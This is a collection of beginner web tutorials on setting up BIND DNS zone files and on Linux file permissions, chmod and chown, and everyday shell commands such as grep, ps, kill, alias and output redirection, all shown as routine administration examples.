Next up is the SOA Record. The SOA (Start Of Authority) resource record indicates that this name server is the best source of information for the data within this zone (this record is required in each db.DOMAIN and db.ADDR file), which is the same as saying this name server is Authoritative for this zone. There can be only one SOA record in every data zone file (db.DOMAIN).

$TTL 86400

firewall.cx. IN SOA voyager.firewall.cx. admin.voyager.firewall.cx. (
                            1 ; Serial Number
                            3h ; Refresh after 3 hours
                            1h ; Retry after 1 hour
                            1w ; Expire after 1 week
                            1h ) ; Negative caching TTL of 1 hour

Let's explain the above code:

firewall.cx. is the domain name and must always be stated in the first column of our line. Be sure you include the trailing dot "." after the domain name; we'll explain later on why this is needed.

The IN stands for Internet. This is one class of data and while other classes exist, you won't see them at all because they are not used :)

The SOA is an important resource record. What follows is the actual primary name server for firewall.cx. In our example, this is the server named "voyager" and its Fully Qualified Domain Name (FQDN) is voyager.firewall.cx. Notice the trailing "." is present here as well.

Next up is the entry admin.voyager.firewall.cx. which is the email address of the person responsible for this domain. Take the dot "." after the admin entry and replace it with a "@" and you have a valid email address: admin@voyager.firewall.cx. Most times you will see root, postmaster or hostmaster instead of "admin".

The "(" parentheses allow the SOA record to span more than one line, while in most cases the fields that follow are used by the secondary name servers and any other name server requesting information about the domain.

The serial number "1 ; Serial Number" entry is used by the secondary name server to keep track of changes that might have occurred in the master's zone file. When the secondary name server contacts the primary name server, it will check to see if this value is the same. If the secondary's serial number is lower than the primary's, then its data is out of date; when equal, the data is up to date. This means that when you make any modifications to the primary's zone file, you must increment the serial number by at least one.

Note that anything after the semicolon (;) is considered a remark and not taken into consideration by the DNS BIND Service. This allows us to create easy-to-understand comments for future reference.

The refresh "3h ; Refresh after 3 hours" tells the secondary name server how often to check the primary's server's data, to ensure its copy for this zone is up to date.

If the secondary name server tries to contact the primary and fails, the retry value "1h ; Retry after 1 hour" tells the secondary name server how long to wait before it tries to contact the primary again.

If the secondary name server fails to contact the primary for longer than the time specified in the fourth entry "1w ; Expire after 1 week", then the zone data on the secondary name server is considered too old and will expire.

The last line "1h ) ; Negative caching TTL of 1 hour" is how long a name server will cache negative responses about the zone. These negative responses say that a particular domain, or type of data sought for a particular domain name, doesn't exist. Notice the SOA section finishes with the ")" parenthesis.

Next up in the file are the name server (NS) records:

; Name Servers defined here

firewall.cx. IN NS voyager.firewall.cx.

firewall.cx. IN NS gateway.firewall.cx.

These entries define the two name servers (voyager and gateway) for our domain firewall.cx. These entries will be also in the db.ADDR file for this domain as we will see later on.

It's time to enter our MX records. These records define the mail exchange servers for our domain, and this is how any client, host or email server is able to find a domain's email server:

; Mail Exchange servers defined here

firewall.cx. IN MX 10 voyager.firewall.cx.

firewall.cx. IN MX 20 gateway.firewall.cx.

Let's explain what exactly these entries mean. The first line specifies that voyager.firewall.cx is a mail exchanger for firewall.cx, just as the second line (...IN MX 20 gateway...) specifies that gateway.firewall.cx is also a mail exchanger for the domain. The MX record indicates that the following hosts are mail exchanger servers for the domain and the numbers 10 and 20 indicate the priority level. The smaller the number, the higher the priority.

This means that voyager.firewall.cx is a higher priority mail server than gateway.firewall.cx.  If another server trying to send email to firewall.cx fails to contact the highest priority mail server (voyager.firewall.cx), it will then fall back to the secondary, in which our case is gateway.firewall.cx.

These entries were introduced to prevent mail loops. When another email server (unlikely for a private domain like mine, but the same rule applies for the Internet) wants to send mail to firewall.cx, it will try to contact first the mail exchanger with the smallest number, which in our case is voyager.firewall.cx. The smaller the number, the higher the priority if there are more than one mail servers.

In our example, if we replaced:

firewall.cx. IN MX 10 voyager.firewall.cx.

firewall.cx. IN MX 20 gateway.firewall.cx.

with

firewall.cx. IN MX 50 voyager.firewall.cx.

firewall.cx. IN MX 100 gateway.firewall.cx.

the result in matter of server priority, would be the same.

Let's now have a look our next part of our zone file: Host IP Addresses and Alias records:

; Host addresses defined here

localhost.firewall.cx. IN A 127.0.0.1

voyager.firewall.cx. IN A 192.168.0.15

enterprise.firewall.cx. IN A 192.168.0.5

gateway.firewall.cx. IN A 192.168.0.10

admin.firewall.cx. IN A 192.168.0.1

; Aliases

www.firewall.cx. IN CNAME voyager.firewall.cx.

Most fields in this section are easy to understand. We start by defining our localhost (local loopback) "localhost.firewall.cx. IN A 127.0.0.1" and continue with the servers on our private network: voyager, enterprise, gateway and admin. The "A" record stands for Address. So "voyager.firewall.cx. IN A 192.168.0.15" translates to a host called voyager, located in the firewall.cx domain, with an INternet (IN) address of 192.168.0.15. See the pattern? :)

The second block has the aliases table, where we created a Canonical Name (CNAME) record. A CNAME record simply maps an alias to its canonical name; in our example, www is the alias and voyager.firewall.cx is the canonical name.

When a name server looks up a name and finds CNAME records, it replaces the name (alias - www) with its canonical name (voyager.firewall.cx) and looks up the canonical name (voyager.firewall.cx).

For example, when a name server looks up www.firewall.cx, it will replace the 'www' with 'voyager' and lookup the IP Address for voyager.firewall.cx.

This also explains the existence of "www" in so many URLs - it's nothing more than an alias which, ultimately, is replaced with the canonical name defined in the CNAME record.

The Complete db.domain Configuration File

That completes a simple domain setup! We have now created a working zone file that looks like this:

$TTL 86400

firewall.cx. IN SOA voyager.firewall.cx. admin.voyager.firewall.cx. (
                            1 ; Serial Number
                            3h ; Refresh after 3 hours
                            1h ; Retry after 1 hour
                            1w ; Expire after 1 week
                            1h ) ; Negative caching TTL of 1 hour

; Name Servers defined here

firewall.cx. IN NS voyager.firewall.cx.

firewall.cx. IN NS gateway.firewall.cx.

; Mail Exchange servers defined here

firewall.cx. IN MX 10 voyager.firewall.cx.

firewall.cx. IN MX 20 gateway.firewall.cx.

; Host Addresses Defined Here

localhost.firewall.cx. IN A 127.0.0.1

voyager.firewall.cx. IN A 192.168.0.15

enterprise.firewall.cx. IN A 192.168.0.5

gateway.firewall.cx. IN A 192.168.0.10

admin.firewall.cx. IN A 192.168.0.1

; Aliases

www.firewall.cx. IN CNAME voyager.firewall.cx.

A quick glance at this file tells you a lot about our lab domain firewall.cx, and this is probably the best time to explain why we should not omit the trailing dot at the end of the domain name:

If we took gateway.firewall.cx as an example and omitted the dot "." at the end of our entries, the system would translate it like this: gateway.firewall.cx.firewall.cx - definitely not what we want!

As you see, the 'firewall.cx' is appended to the end of our Fully Qualified Domain Name for the particular resource record (gateway). This is why it's so important to never forget that extra dot "." at the end!
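
Before loading the file, and assuming your BIND installation ships the named-checkzone utility (included with BIND 9 and later), you can sanity-check the zone file's syntax and serial number; a healthy file should report something like this:

root@gateway [~]# named-checkzone firewall.cx /var/named/db.firewall.cx
zone firewall.cx/IN: loaded serial 1
OK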

Our next article will cover the db.ADDR file, which will take the name db.192.168.0 for our example.

  • Hits: 45028

Linux BIND DNS - Part 1: Introduction To The DNS Database (BIND)

BIND (Berkely Internet Name Domain) is a popular software for translating domain names into IP addresses and usually found on Linux servers. This article will explain the basic concepts of DNS BIND and analyse the associated files required to successfully setup your own DNS BIND server. After reading this article, you will be able to successfully install and setup a Linux BIND DNS server for your network.

Zones and Domains

The programs that store information about the domain name space are called name servers, as you probably already know. Name Servers generally have complete information about some part of the domain name space (a zone), which they load from a file. The name server is then said to have authority for that zone.

The term zone is not one that you come across every day while you're surfing the Internet. We tend to think that the domain concept is all there is when it comes to DNS, which makes life easy for us, but when dealing with DNS servers that hold data for our domains (name servers), we need to introduce the term zone, since it is essential to understanding the setup of a DNS server.

The difference between a zone and a domain is important, but subtle. The best way to understand the difference is by using a good example, which is coming up next.

The COM domain is divided into many zones, including the hp.com zone, sun.com, it.com. At the top of the domain, there is also a com zone.

The diagram below shows you how a zone fits within a domain:

 dns-bind-intro-1

 

The trick to understanding how it works is to remember that a zone exists "inside" a domain. Name servers load zone files, not domains. Zone files contain information about the portion of a domain for which they are responsible. This could be the whole domain (sun.com, it.com) or simply a portion of it (hp.com + pr.hp.com).

In our example, the hp.com domain has two subdomains, support.hp.com and pr.hp.com. The first one, support.hp.com is controlled by its own name servers as it has its own zone, called the support.hp.com zone. The second one though, pr.hp.com is controlled by the same name server that takes care of the hp.com zone.

The hp.com zone has very little information about the support.hp.com zone; it simply knows it's right below. If anyone requires more information on support.hp.com, they will be directed to contact the authoritative name servers for that subdomain, which are the name servers for that zone.

So you see that even though support.hp.com is a subdomain just like pr.hp.com, it is not setup and controlled the same way as pr.hp.com.

On the other hand, the sun.com domain has one zone (the sun.com zone) that contains and controls the whole domain. This zone is loaded by the authoritative name servers.

BIND? Never Heard of it!

As mentioned in the beginning of this article, BIND stands for Berkely Internet Name Domain. Keeping things simple, it's a program you download (www.bind.org) and install on your Unix or Linux server to give it the ability to become a DNS server for your private (lan) or public (Internet) network.

The majority of DNS servers are based on BIND as it's a proven and reliable DNS server. The download is approximately 4.8 MBytes. Untarring and compiling BIND is a pretty straightforward process and the steps required will depend on your Linux distribution and version. If you follow the instructions provided with the download, you shouldn't have any problems. For simplicity purposes, we assume you've compiled and installed the BIND program using the provided instructions.

Setting Up Your Zone Data

No matter what Linux distribution you have, the file structure is pretty much the same. I have BIND installed on my Linux server, which runs Slackware v8 with kernel 2.4.19. By following the installation procedure found in the documentation provided with BIND, you will have the server installed within 15 min at most.

Once the installation of BIND is complete you need to start creating your zone data files. Remember, these are the files the DNS server will load in order to understand how your domain is setup and the various hosts within it.

A DNS server has multiple files that contain information about the domain setup. From these files, one will map all host names to IP Addresses and other files will map the IP Address back to hostnames. The name-to-IP Address lookup is sometimes called forward mapping and the IP Address-to-name lookup reverse mapping. Each network will have its own file for reverse-mapping.

As a convention in this section, a file that maps hostnames to IP Addresses will be called db.DOMAIN, where DOMAIN is the name of your domain, e.g. db.firewall.cx, and db is short for DataBase. The files mapping IP Addresses to hostnames are called db.ADDR, where ADDR is the network number without trailing zeros or the specification of a netmask, e.g. db.192.168.0 for the 192.168.0.0 network.

The collection of our db.DOMAIN and db.ADDR files are our Zone Data files. There are a few other zone data files, some of which are created during the installation of BIND: named.ca, localhost.zone and named.local.

Named.ca contains information about the root servers on the Internet, should your DNS server require to contact one of them. Localhost.zone and Named.local are there to cover the loopback network. The loopback address is a special address hosts use to direct traffic to themselves. This is usually IP Address 127.0.0.1, which belongs to the 127.0.0.0/24 network.

These files must be present in each DNS server and are the same for every DNS server.

Quick Summary of Our Files

Let's have a quick look at the files we have covered so far to make sure we don't lose track:

1) Following files must be created by you and will contain the data for our zone:

  • db.DOMAIN e.g db.space.net - Host to IP Address mapping
  • db.ADDR e.g db.192.168.0 - IP Address to Host mapping

2) Following files are usually created by the BIND installation:

  • named.ca - Contains the ROOT DNS servers
  • named.local & localhost.zone - Special files so the server can direct traffic to itself.

You should also be aware that the file names can change; there is no standard for the names, it's just very convenient and tidy to keep some type of convention.

To tie all the zone data files together a name server needs a configuration file. BIND version 8 and above calls it named.conf and it can be found in your /etc dir once you install the BIND package. Named.conf simply tells the name server where your zone files are located and we will be analysing this file later on.

Most entries in the zone data files are called DNS resource records. Since DNS lookups are case insensitive, you can enter names in your zone data files in uppercase, lowercase or mixed case. I tend to use lowercase.

Resource records must start in the first column of a line. The DNS RFCs have samples that present the order in which one should enter the resource records. Some people choose to follow this order, while others don't. You are not required to follow this order, but I do :)

Here is the order of resource records in the zone data file:

SOA record - Indicates authority for this zone.

NS record - Lists a name server for this zone

MX record - Indicates the mail exchange server for the domain

A record - Name to IP Address mapping (gives the IP Address for a host)

CNAME record - Canonical name (used for aliases)

PTR record - Address to name mapping (used in db.ADDR)

The next article (Part 2) deals with the construction of our first zone data file, db.firewall.cx of our example firewall.cx domain.

 

 

  • Hits: 178254

Finding More Information On The Linux Operating System

Since this document merely scratches the surface when it comes to Linux, you will probably find you have lots of questions and possibly problems. Whether these are problems with the operating system, or not knowing the proper way to perform the task in Linux, there is always a place to find help.

On our forums you'll find a lot of experienced people always willing to go that extra mile to help you out, so don't hesitate to ask - you'll be surprised at the responses!

Generally the Linux community is a very helpful one. You'll be happy to know that there is more documentation, tutorials, HOW-TOs and FAQs (Frequently Asked Questions) for Linux than for all other operating systems in the world!

If you go to any search engine, forum or news group researching a problem, you'll always find an answer.

To save you some searching, here are a few websites where you can find information covering most aspects of the operating system:

  • https://tldp.org/ - The Linux Documentation Project homepage has the largest collection of tutorials, HOW-TOs and FAQs for Linux.
  • https://www.linux.org/ - The documentation page from the official Linux.org website. Contains links to a lot of useful information.
  • https://forums.justlinux.com/ - Contains a library of information for beginners on all topics from setting up hardware, installing software, to compiling the kernel
  • https://rpm.pbone.net/ - Pbone is a great search engine to find RPM packages for your Linux operating system.
  • https://sourceforge.net/ - The world's largest development and download repository of Open Source code (free) and applications. Sourceforge hosts thousands of open source projects, most of which are of course for the Linux operating system.

We hope you have enjoyed this brief introduction to the Linux operating system and hope you'll be tempted to try Linux for yourself. You've surely got nothing to lose and everything to gain!

Remember, Linux is the No.1 operating system when it comes to web services and mission critical servers - it's not a coincidence other major software vendors are doing everything they can to stop Linux from gaining more ground!

Visit our Linux section to discover more engaging technical articles on the Linux Operating system.

  • Hits: 18182

Linux File & Folder Permissions

File & folder security is a big part of any operating system and Linux is no exception!

These permissions allow you to choose exactly who can access your files and folders, providing an overall enhanced security system. This is one of the major weaknesses in the older Windows operating systems where, by default, all users can see each other's files (Windows 95, 98, Me).

For the later versions of the Windows operating system, such as NT, 2000, XP and 2003, things look a lot safer as they fully support file & folder permissions, just as Linux has done since the beginning.

Together, we'll now examine a directory listing from our Linux lab server, to help us understand the information provided. While a simple 'ls' will give you the file and directory listing within a given directory, adding the flag '-l' will reveal a number of new fields that we are about to take a look at:

linux-introduction-file-permissions-1

It's possible that most Linux users have seen similar information regarding their files and folders and therefore should feel pretty comfortable with it. If, on the other hand, you happen to fall into the group of people who haven't seen such information before, then you either work too much in the GUI interface of Linux, or simply haven't had much experience with the operating system :)

Whatever the case, don't disappear - it's easier than you think!!

Understanding "drwx"

Let's start from scratch, analysing the information in the previous screenshot.

linux-introduction-file-permissions-2

In the yellow column on the right we have the file & directory names (dirlist.txt, document1, document2 etc.) - nothing new here. Next, in the green column, we will find the time and date of creation.

Note that the date and time column will not always display in the format shown. If the file or directory it refers to was created in a year different from the current one, it will show only the day, month and year, discarding the time of creation.

For example, if the file 'dirlist.txt' was created on the 27th of June, 2004, then the system would show:

Jun 27 2004 dirlist.txt

instead of

Jun 27 11:28 dirlist.txt

A small but important note when examining files and folders! Also keep in mind that the date will change when the file is modified. As such, if we edited a file created last year, the next time we typed 'ls -l' the file's date information would change to today's date. This is one way you can check whether files have been modified or tampered with.

The next column (purple) contains the file size in bytes - again nothing special here.

linux-introduction-file-permissions-3

The next column (orange) shows the file's ownership. Every file in Linux is 'owned' by a particular user; normally this is the user who created the file, but you can always give ownership to someone else.

The owner might belong to a particular group, in which case this file is also associated with the user's group. In our example, the left column labeled 'User' refers to the actual user that owns the file, while the right column labeled 'group' refers to the group the file belongs to.

Looking at the file named 'dirlist.txt', we can now understand that it belongs to the user named 'root' and group named 'sys'.

Following the permissions is the column with the cyan border in the listing.

The system identifies files by their inode number, which is the unique file system identifier for the file. A directory is actually a listing of inode numbers with their corresponding filenames. Each filename in a directory is a link to a particular inode.

Links let you give a single file more than one name. Therefore, the numbers indicated in the cyan column specify the number of links to the file.

As it turns out, a directory is actually just a file containing information about link-to-inode associations.

Next up is a very important column, that's the first one on the left containing the '-rwx----w-' characters. These are the actual permissions set for the particular file or directory we are examining.

To make things easier, we've split the permissions section into a further 4 columns as shown above. The first column indicates whether we are talking about a directory (d), file (-) or link (l).

In the newer Linux distributions, the system will usually present the directory name in colour, helping it to stand out from the rest of the files. In the case of a file, a dash (-) or the letter 'f' is used, while links use the letter 'l'. For those unfamiliar with links, consider them similar to Windows shortcuts.

linux-introduction-file-permissions-4

Column 2 refers to the user rights. This is the owner of the file, directory or link and these three characters determine what the owner can do with it.

The 3 characters on column 2 are the permissions for the owner (user rights) of the file or directory. The next 3 are permissions for the group that the file is owned by and the final 3 characters define the access permissions for the others group, that is, everyone else not part of the group.

So, there are 3 possible attributes that make up file access permissions:

  • r - Read permission. Whether the file may be read. In the case of a directory, this would mean the ability to list the contents of the directory.
  • w - Write permission. Whether the file may be written to or modified. For a directory, this defines whether you can make any changes to the contents of the directory. If write permission is not set then you will not be able to delete, rename or create a file.
  • x - Execute permission. Whether the file may be executed. In the case of a directory, this attribute decides whether you have permission to enter, run a search through that directory or execute some program from that directory.

Let's take a look at another example:

linux-introduction-file-permissions-5

Take the permissions of 'red-bulb', which are drwxr-x---. The owner of this directory is user david and the group owner of the directory is sys. The first 3 permission attributes are rwx. These permissions allow full read, write and execute access to the directory to user david. So we conclude that david has full access here.

The group permissions are r-x. Notice there is no write permission given here so while members of the group sys can look at the directory and list its contents, they cannot create new files or sub-directories. They also cannot delete any files or make changes to the directory content in any way.

Lastly, no one else has any access because the access attributes for others are - - -.

If we assume the permissions are drw-r--r--, you'll see that the owner of the directory (david) has read and write permission set but, because there is no execute (x) permission, is unable to enter it! You must have both read and execute (r-x) in order to enter a directory and list its contents. Members of the group sys have a similar problem: they can read (list) the directory's contents but can't enter it because there is no execute (x) permission given!

Lastly, everyone else can also read (list) the directory but is unable to enter it because of the absence of the execute (x) permission.

Here are some more examples focusing on the permissions:

-r--r--r-- : This means that owner, group and everyone else has only read permissions to the file (remember, if there's no 'd' or 'l', then we are talking about a file).

-rw-rw-rw- : This means that the owner, group and everyone else has read and write permissions.

-rwxrwxrwx : Here, the owner, group and everyone else has full permissions, so they can all read, write and execute the file.

Modifying Ownership & Permissions

So how do you change permissions or change the owner of a file?

Changing the owner or group owner of a file is very simple, you just type 'chown user:group filename.ext', where 'user' and 'group' are those to whom you want to give ownership of the file. The 'group' parameter is optional, so if you type 'chown david file.txt', you will give ownership of file.txt to the user named david.

In the case of a directory, nothing much changes as the same command is used. However, because directories usually contain files that also need to be assigned to the new user or group, we use the '-R' flag, which stands for 'recursive' - in other words all subdirectories and their files: 'chown -R user:group dirname'.

To change permissions you use the 'chmod' command. The possible options here are 'u' for the user, 'g' for the group, 'o' for other, and 'a' for all three. If you don't specify one of these letters it will change to all by default. After this you specify the permissions to add or remove using '+' or '-' . Let's take a look at an example to make it easier to understand:

If we wanted to add read, write and execute for the owner of a particular file, we would type the following: 'chmod u+rwx file.txt'. If, on the other hand, you typed 'chmod g-rw file.txt', you would take away read and write permissions on that file for the group.
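Here is a minimal sketch putting chown and chmod together - the file name, user and group are hypothetical, so substitute your own:

$ ls -l report.txt
-rw-r--r--  1 root   sys   1024 Jun 27 11:28 report.txt
$ chown david:sys report.txt      # hand ownership to user david and group sys (run as root)
$ chmod u+x report.txt            # add execute permission for the owner
$ chmod o-r report.txt            # remove read permission for everyone else
$ ls -l report.txt
-rwxr-----  1 david  sys   1024 Jun 27 11:28 report.txt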

While it's not terribly difficult to modify the permissions of a file or directory, remembering all the flags can be hard. Thankfully there's another way, which is less complicated and much faster. By replacing the permissions with numbers, we are able to calculate the required permissions and simply enter the correct sum of various numbers instead of the actual rights.

The way this works is simple. We are aware of three different permissions, Read (r), Write (w) and Execute (x). Each of these permissions is assigned a number as follows:

r (read) - 4

w (write) - 2

x (execute) - 1

Now, to correctly assign a permission, all you need to do is add up the level you want. So if you want someone to have read and write, you get 4+2=6; if you want someone to have just execute, it's 1; and zero means no permissions. You work out the number for each of the three sections (owner, group and everyone else).

If you want to give read, write and execute to the owner and nothing to everyone else, you'd get the number 7 0 0. Starting from the left, the first digit (7) represents the permissions for the owner of the file, the second digit (0) is the permissions for the group, and the last (0) is the permissions for everyone else. You get the 7 by adding read, write and execute permissions according to the numbers assigned to each right as shown in the previous paragraphs: 4+2+1 = 7.

r, w, x Permissions     Calculated Number
---                     0
--x                     1
-w-                     2
-wx                     3 (2+1)
r--                     4
r-x                     5 (4+1)
rw-                     6 (4+2)
rwx                     7 (4+2+1)


If you want to give full access to the owner, only read and execute to the group, and only execute to everyone else, you'd work it out like this :

owner: rwx = 4 + 2 + 1 = 7

group: r-x = 4 + 0 + 1 = 5

everyone: --x = 0 + 0 + 1 = 1

So your number will be 751: 7 for the owner, 5 for the group, and 1 for everyone else. The command will be 'chmod 751 file.txt'. It's simple, isn't it?

If you want to give full control to everyone using all possible combinations, you'd give them all 'rwx', which equals the number '7', so the final three digit number would be '777':

linux-introduction-file-permissions-6

If on the other hand you decide not to give anyone any permission, you would use '000' (now nobody can access the file, not even you!). However, you can always change the permissions to give yourself read access, by entering 'chmod 400 file.txt'.
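As a quick recap, here is a small hypothetical example showing the numeric method next to the resulting permission string - the file name and listing details are made up for illustration:

$ chmod 751 file.txt     # owner: rwx (7), group: r-x (5), others: --x (1)
$ ls -l file.txt
-rwxr-x--x  1 david  sys  512 Jun 27 11:28 file.txt
$ chmod 400 file.txt     # owner: r-- (4), group and others: no access
$ ls -l file.txt
-r--------  1 david  sys  512 Jun 27 11:28 file.txt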

For more details on the 'chmod' command, please take a look at the man pages.

As we will see soon, the correct combination of user and group permissions will allow us to perform our work while keeping our data safe from the rest of the world.

For example in order for a user or group to enter a directory, they must have at least read (r) and execute (x) permissions on the directory, otherwise access to it is denied:

linux-introduction-file-permissions-7

As seen here, user 'mailman' is trying to access the 'red-bulb' directory which belongs to user 'david' and group 'sys'. Mailman is not a member of the 'sys' group and therefore can't access it. At the same time the folder's permissions allow neither the group nor everyone to access it.

Now, what we did was alter the permissions so that 'everyone' has at least read and execute permission and is therefore able to enter the folder - let's check it out:

linux-introduction-file-permissions-8

Here we see the 'mailman' user successfully entering the 'red-bulb' directory because everyone has read (r) and execute (x) access to it!

The world of Linux permissions is pretty user friendly as long as you see it from the right perspective :) Practice and reviewing the theory will certainly help you remember the most important information so you can perform your work without much trouble.

If you happen to forget something, you can always re-visit us - any time of the day!

Continuing on to our last page, we will provide you with a few links to some of the world's greatest Linux resources, covering Windows to Linux migration, various troubleshooting techniques, forums and much more that will surely be of help.

This completes our initial discussion on the Linux operating system. Visit our Finding More Information page to discover useful resources that will assist you in your Linux journey or visit our Linux section to access more technical articles on the Linux operating system.

  • Hits: 329064

Advanced Linux Commands

Now that you're done learning some of the Basic Linux commands and how to use them to install Linux Software, it's time we showed you some of the other ways to work with Linux. Bear in mind that each distribution of Linux (Redhat, SUSE, Mandrake etc) will come with a slightly different GUI (Graphical User Interface) and some of them have done a really good job of creating GUI configuration tools so that you never need to type commands at the command line.

Vi Editor

For example, if you want to edit a text file you can easily use one of the powerful GUI tools like Kate, Kwrite etc., which are all like notepad in Windows though much more powerful; they have features such as multiple file editing and syntax highlighting (if you open an HTML file it understands the HTML tags and highlights them for you). However, you can also use the very powerful vi editor.

When first confronted by vi, most users are totally lost: you open a file in vi (e.g. vi document1) and try to type, but nothing seems to happen... the system just keeps beeping!

Well, that's because vi functions in two modes. One is the command mode, where you can give vi commands such as open a file, exit, split the view, search and replace etc., and the other is the insert mode, where you actually type text!

Don't be put off by the fact that vi doesn't have a pretty GUI interface to go with it, this is an incredibly powerful text editor that would be well worth your time learning... once you're done with it you'll never want to use anything else!


Since most people find vi hard to use straight off, there is a useful little walk-through tutorial that you can access by typing vimtutor at a command line. The tutorial opens vi with the tutorial in it, and you try out each of the commands and shortcuts in vi itself. It's very easy and makes navigating around vi a snap. Check it out.
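As a rough illustration of the two modes, here is the typical edit-and-save cycle (assuming a hypothetical file called notes.txt):

$ vi notes.txt      # opens the file in command mode
i                   # switch to insert mode and start typing your text
<Esc>               # press Escape to return to command mode
:wq                 # write (save) the file and quit
:q!                 # or, instead, quit without saving any changes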

Grep

Another very useful Linux command is the grep command. This little baby searches for a string in any file. The grep command is frequently used in combination with other commands in order to search for a specific string. For example, if we wanted to check our web server's log file for a specific URL query or IP address, the 'grep' command would do this job just fine.

If, on the other hand, you want to find every occurrence of 'hello world' in every .txt file you have, you would type grep "hello world" *.txt

You'll see some very common command structures later on that utilise 'grep'. At the same time, you can go ahead and check grep's man page by typing man grep - it has a whole lot of very powerful options.

linux-introduction-avd-cmd-line-3
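To give you a taste of those options, here are a few hedged examples - the file names, paths and search strings are hypothetical:

$ grep "192.168.0.10" /var/log/httpd/access_log   # find requests from a specific IP address in a web server log
$ grep -i "error" messages                        # -i ignores upper/lower case
$ grep -n "hello world" *.txt                     # -n also prints the line number of each match
$ grep -r "ServerName" /etc/                      # -r searches recursively through a whole directory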

PS - Process ID (PID) display

The ps command will show all the tasks you are currently running on the system; it's the equivalent of the Windows Task Manager, and you'll be happy to know that there are also GUI versions of 'ps'.

If you're logged in as root on your Linux system and type ps -aux, you'll see all processes running on the system by every user. On some systems, for security purposes, ordinary users will only see the processes they own when typing the same command.

linux-introduction-avd-cmd-line-4

Again, man ps will provide you with a bundle of options available for the command.

Kill

The 'kill' command is complementary to the 'ps' command as it will allow you to terminate a process revealed with the previous command. In cases where a process is not responding, you would use the following syntax to effectively kill it: kill -9 pid where 'pid' is the Process ID (PID) that 'ps' displays for each task.

linux-introduction-avd-cmd-line-5

In the above example, we ran a utility called 'bandwidth' twice which is shown as two different process IDs (7171 & 13344) using the ps command. We then attempted to kill one of them using the command kill -9 7171 . The next time we ran the 'ps', the system reported that a process that was started with the './bandwidth' command had been previously killed.

Another useful flag we can use with the 'kill' command is -HUP. This neat flag won't terminate the process; instead, most daemons treat it as an instruction to re-read their configuration files. So, if you've got a service running and need it to pick up changes made in its configuration file, then the -HUP flag will do just fine. Many people look at it as an alternative 'reload' command.

The complete syntax to make use of the flag is: kill -HUP pid where 'pid' is the process ID number you can obtain using the 'ps' command, just as we saw in the previous examples.
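Here is a minimal sketch of the ps/kill combination - the process name and PIDs are of course hypothetical:

$ ps aux | grep bandwidth      # find the process and note its PID
root   7171  0.0  0.1  2204  604 pts/0  S  11:28  0:00 ./bandwidth
$ kill -9 7171                 # forcefully terminate it
$ kill -HUP 8245               # or ask a daemon with PID 8245 to reload its configuration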

Chaining Commands, Redirecting Output, Piping

In Linux, you can chain groups of commands together with incredible ease. This is where the true power of the Linux command line lies: you use small tools, each of which does one little task, and pass the output on to the next one.

For example, when you run the ps aux command, you might see a whole lot of output that you cannot read in one screen, so you can use the pipe symbol ( | ) to send the output of 'ps' to 'grep' which will search for a string in that output. This is known as 'piping' as it's similar to plumbing where you use a pipe to connect two things together.

linux-introduction-avd-cmd-line-6

Say you want to find the task 'antispam': you can run ps aux | grep antispam. Ps 'pipes' its output to grep, which then searches for the string, showing you only the lines containing that text.

If you wanted ps to display one page at a time, you can pipe the output of ps to either more or less. The advantage of less is that it allows you to scroll upwards as well. Try this: ps aux | less. Now you can use the cursor keys to scroll through the output, or use pageup and pagedown.

Alias

The 'alias' command is very neat: it lets you make a shortcut keyword for another, longer command. Say you don't always want to type ps aux | less - you can create an alias for it. We'll call our alias command 'pl', so you type alias pl='ps aux | less'.

Now whenever you type pl, it will actually run ps aux | less - neat, isn't it?

linux-introduction-avd-cmd-line-7

 

You can view the aliases that are currently set by typing alias:

linux-introduction-avd-cmd-line-8

As you can see, there are quite a few aliases already listed for the 'root' account we are using. You'll be surprised to know that most Linux distributions automatically create a number of aliases by default - these are there to make your life as easy as possible and can be deleted anytime you wish.
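One thing worth knowing is that an alias defined at the command line only lasts for your current session. Assuming you use the common bash shell, here is a small sketch of how you would manage an alias and keep it permanently:

$ alias pl='ps aux | less'                        # available until you log out
$ unalias pl                                      # remove the alias again
$ echo "alias pl='ps aux | less'" >> ~/.bashrc    # append it to your bash startup file so it survives logouts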

Output Redirection

It's not uncommon to want to redirect the output of a command to a text file for further processing. In the good old DOS operating system, this was achieved by using the '>' operator. Even today, with the latest Windows operating systems, you would open a DOS command prompt and use the same method!

The good news is that Linux also supports these functions without much difference in the command line.

For example, if we wanted to store the listing of a directory into a file, we would type the following: ls > dirlist.txt:

linux-introduction-avd-cmd-line-9

As you can see, we've taken the output of 'ls' and redirected it to our file. Let's now take a look and see what has actually been stored in there by using the command cat dirlist.txt :

linux-introduction-avd-cmd-line-10

As expected, the dirlist.txt file contains the output of our previous command. So you might ask yourself 'what if I need to append the results?' - No problem here, as we've already got you covered.

When there's a need to append to a file, as in DOS, we simply use the double '>>' operator. This will append the new output to the file we have specified on the command line:

linux-introduction-avd-cmd-line-11

The above example clearly shows the content of our file named 'document2' which is then appended to the previously created file 'dirlist.txt'. With the use of the 'cat' command, we are able to examine its contents and make sure the new data has been appended.

Note:

By default, the single > will overwrite the file if it exists, so if you give the ls > dirlist.txt command again, it will overwrite the first dirlist.txt. However, if you specify >> it will add the new output below the previous output in the file. This is known as output redirection.

In DOS you typically run one command at a time; in Linux, however, you can issue several commands on a single line. For example, let's say we want to see the directory list, then delete all files ending with .txt, then see the directory list again.

This is possible in Linux using one statement as follows: ls -l; rm -f *.txt; ls -l. Basically you separate each command using a semicolon, ';'. Linux then runs all three commands one after the other. This is also known as command chaining.
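Putting chaining and redirection together, here's a small hypothetical example - the file names are made up:

$ ls -l > before.txt; rm -f *.log; ls -l > after.txt   # capture a listing, delete all .log files, capture another listing
$ cat before.txt after.txt >> report.txt               # append both listings to a report file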

Background Processes

If you affix an ampersand '&' to the end of any command, it will run in the background and not disturb you. There is no real equivalent for this at the DOS prompt, and it is very useful because it lets you start a command in the background and carry on with other tasks while waiting for it to complete.

The only thing you have to keep in mind is that you will not see the output from the command on your screen since it is in the background, but we can redirect the output to a file the way we did two paragraphs above.

For example, if you want to search through all the files in a directory for the word 'Bombadil', but you want this task to run in the background and not interrupt you, you can type this: grep "Bombadil" *.* >> results.txt& . Notice that we've added the ampersand '&' character to the end of the command, so it will now run in the background and place the results in the file results.txt . When you press enter, you'll see something like this :

$ grep "Bombadil" *.* >> results.txt&

[1] 1272

linux-introduction-avd-cmd-line-12

Our screen shot confirms this. We created a few new files that contained the string 'Bombadil' and then gave the command grep "Bombadil" *.* >> results.txt& . The system accepted our command and placed the process in the background using PID (Process ID) 14976. When we next gave the 'ls' command to see the listing of our directory we saw our new file 'results.txt' which, as expected, contained the files and lines where our string was found.

